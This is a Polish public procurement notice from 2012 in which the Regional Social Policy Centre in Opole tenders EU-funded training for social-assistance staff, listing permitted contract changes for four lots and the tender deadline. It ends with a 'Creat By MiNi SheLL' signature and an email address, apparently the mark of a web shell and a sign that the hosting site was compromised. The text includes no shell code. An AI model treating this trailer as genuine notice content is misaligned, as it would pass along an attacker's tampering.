<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część 1
Zamawiający przewiduje następujące zmiany: 
a) zmniejszenie liczby uczestników cykli szkoleniowych, o których mowa w §1 ust. 1 lit. a) , b) i lit. c),  co może być spowodowane brakiem zgłoszeń w prowadzonym procesie rekrutacji, jak również przypadkami losowymi w szczególności choroby osoby, która zadeklarowała udział w cyklu szkoleniowym, jednak w przypadku osób zatwierdzonych do uczestnictwa, 
a nieobecnych Wykonawca nie ponosi strat wynikających z tej nieobecności,
b)	 rezygnację z przeprowadzenia cykli szkoleniowych, o których mowa w §1 ust. 1 lit. a), b) i lit. c),  z powodu braku zainteresowania tematyką i brakiem zgłoszeń. W takim przypadku wynagrodzenie Wykonawcy nie przysługuje, o ile Zamawiający poinformuje Wykonawcę o tym fakcie co najmniej 14 dni przed planowanym terminem rozpoczęcia cykli szkoleniowych,
c)	 zmianę lub modyfikację zakresu oraz zmianę formy obywania się zjazdów cykli szkoleniowych wskazanych w załączniku nr 1 do niniejszej umowy - przedmiot zamówienia, co może być spowodowane m.in. propozycjami osób wskazanych w Ofercie z dnia      2012 r. stanowiącej integralną część umowy, bądź koniecznością dostosowania zakresu cyklu do wymogów rynkowych lub oczekiwań uczestników,
d)	zmianę terminu wykonania przedmiotu umowy ze względów organizacyjnych ze szczególnym uwzględnieniem konieczności przedłużenia rekrutacji,
Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy 
      także w przypadkach, gdy:
a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
b)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
c)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
d)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
e)	nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa oraz zmienią odpowiednio wynagrodzenie Wykonawcy, przy czym stała będzie kwota netto wynagrodzenia,
f)	nastąpi zmiana przedmiotu umowy w szczególności dot. względów organizacyjnych,  technicznych, osobowych Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy, lecz nie prowadzące do zmiany ceny umownej, o której mowa w § 3 ust. 1.

Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na zasobach, których opierał się Wykonawca wskazując spełnianie warunków udziału    w postępowaniu pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy wskazany w ofercie, o której mowa w § 7 ust. 1.

Część 2
Zamawiający przewiduje następujące zmiany: 
a)	 zmniejszenie liczby uczestników szkolenia, o których mowa w §1 ust. 1  co może być spowodowane brakiem zgłoszeń w prowadzonym procesie rekrutacji, jak również przypadkami losowymi w szczególności choroby osoby, która zadeklarowała udział w szkoleniu, jednak w przypadku osób zatwierdzonych do uczestnictwa, a nieobecnych Wykonawca nie ponosi strat wynikających z tej nieobecności,
b)	 rezygnację z przeprowadzenia szkolenia, o którym mowa w  §1 ust. 1  
z powodu braku zainteresowania tematyką i brakiem zgłoszeń. W takim przypadku wynagrodzenie Wykonawcy nie przysługuje, o ile Zamawiający poinformuje Wykonawcę o tym fakcie co najmniej 14 dni przed planowanym terminem rozpoczęcia szkolenia,
c)	 zmianę formy obywania się zjazdów szkoleniowych  wskazanych w załączniku nr 1 do niniejszej umowy - przedmiot zamówienia, co może być spowodowane m.in. oczekiwaniami uczestników bądź ze względów techniczno - organizacyjnych, których nie można było przewidzieć na etapie zawierania umowy,
d)	zmianę terminu wykonania przedmiotu umowy ze względów organizacyjnych ze szczególnym uwzględnieniem konieczności przedłużenia rekrutacji.
Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy 
także w przypadkach, gdy:
a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
b)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
c)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
d)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
e)	nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa oraz zmienią odpowiednio wynagrodzenie Wykonawcy, przy czym stała będzie kwota netto wynagrodzenia,
f)	nastąpi zmiana przedmiotu umowy w szczególności dot. względów organizacyjnych,  technicznych, osobowych Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy, lecz nie prowadzące do zmiany ceny umownej, o której mowa w § 3 ust. 1.

Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na zasobach, których opierał się Wykonawca wskazując spełnianie warunków udziału    w postępowaniu pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy wskazany w ofercie, o której mowa w § 7 ust. 1.

Część 3
Zamawiający przewiduje następujące zmiany: 
a)	 zmniejszenie liczby uczestników cyklu, o których mowa w §1 ust. 1,  co może być spowodowane brakiem zgłoszeń w prowadzonym procesie rekrutacji, jak również przypadkami losowymi w szczególności choroby osoby, która zadeklarowała udział 
w cyklu, jednak w przypadku osób zatwierdzonych do uczestnictwa, a nieobecnych Wykonawca nie ponosi strat wynikających z tej nieobecności,
b)	 całkowitą lub częściową rezygnację z przeprowadzenia cyklu , o którym mowa w  §1 ust. 1  z powodu braku zainteresowania tematyką i brakiem zgłoszeń. W takim przypadku wynagrodzenie Wykonawcy nie przysługuje, o ile Zamawiający poinformuje Wykonawcę o tym fakcie co najmniej 14 dni przed planowanym terminem rozpoczęcia cyklu,
c)	 zmianę lub modyfikację zakresu cyklu oraz zmianę formy obywania się zjazdów, wskazanych w załączniku nr 1 do niniejszej umowy - przedmiot zamówienia, co może być spowodowane m.in. propozycjami osób wskazanych w Ofercie z dnia     2012 r. stanowiącej integralną część umowy, bądź koniecznością dostosowania zakresu cyklu do wymogów rynkowych lub oczekiwań uczestników,
d)	zmianę terminu wykonania przedmiotu umowy ze względów organizacyjnych ze szczególnym uwzględnieniem konieczności przedłużenia rekrutacji.
Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy także w przypadkach, gdy:
a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
b)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
c)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
d)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
e)	nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa oraz zmienią odpowiednio wynagrodzenie Wykonawcy, przy czym stała będzie kwota netto wynagrodzenia,
f)	nastąpi zmiana przedmiotu umowy w szczególności dot. względów organizacyjnych,  technicznych, osobowych Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy, lecz nie prowadzące do zmiany ceny umownej, o której mowa w § 3 ust. 1.

Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na zasobach, których opierał się Wykonawca wskazując spełnianie warunków udziału    w postępowaniu pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy wskazany w ofercie, o której mowa w § 7 ust. 1.

Część 4
Zamawiający przewiduje następujące zmiany: 
a)	 zmniejszenie liczby uczestników szkoleń, o których mowa w §1 ust. 1 lit a) do r), co może być spowodowane brakiem zgłoszeń w prowadzonym procesie rekrutacji, jak również przypadkami losowymi w szczególności choroby osoby, która zadeklarowała udział w szkoleniu, jednak w przypadku osób zatwierdzonych do uczestnictwa, a nieobecnych Wykonawca nie ponosi strat wynikających z tej nieobecności,
b)	 rezygnację z przeprowadzenia szkoleń specjalistycznych, o których mowa w §1 ust. 1 lit. a) do r) z powodu braku zainteresowania tematyką i brakiem zgłoszeń. W takim przypadku wynagrodzenie Wykonawcy nie przysługuje, o ile Zamawiający poinformuje Wykonawcę 
o tym fakcie co najmniej 14 dni przed planowanym terminem rozpoczęcia szkoleń,
c)	 zmianę lub modyfikację zakresu oraz zmianę formy obywania się szkoleń określonej 
w załączniku nr 1 do niniejszej umowy - przedmiot zamówienia, co może być spowodowane m.in. propozycjami osób wskazanych w Ofercie    z dnia    2012 r. stanowiącej integralną część umowy, bądź koniecznością dostosowania zakresu i formy szkoleń do wymogów rynkowych lub oczekiwań uczestników,
d)	 zmianę terminu wykonania przedmiotu umowy ze względów organizacyjnych ze szczególnym uwzględnieniem konieczności przedłużenia rekrutacji.

Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy także w    przypadkach, gdy:
a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
b)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
c)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
d)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
e)	nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa oraz zmienią odpowiednio wynagrodzenie Wykonawcy, przy czym stała będzie kwota netto wynagrodzenia,
f)	nastąpi zmiana przedmiotu umowy w szczególności dot. względów organizacyjnych,  technicznych, osobowych Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy, lecz nie prowadzące do zmiany ceny umownej, o której mowa w § 3 ust. 1.
Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na zasobach, których opierał się Wykonawca wskazując spełnianie warunków udziału    w postępowaniu pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy wskazany w ofercie, o której mowa w § 7 ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w Opolu ul. Głogowska 25 C, 45-315 Opole..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 11:00, miejsce: 45-315 Opole, ul. Głogowska 25 c, pok. 15 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Regionalnego Ośrodka Polityki Społecznej 
w Opolu Poddziałanie 7.1.3 Program Operacyjny Kapitał Ludzki pt. Podnoszenie kwalifikacji kadry pomocy i integracji społecznej w województwie opolskim..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com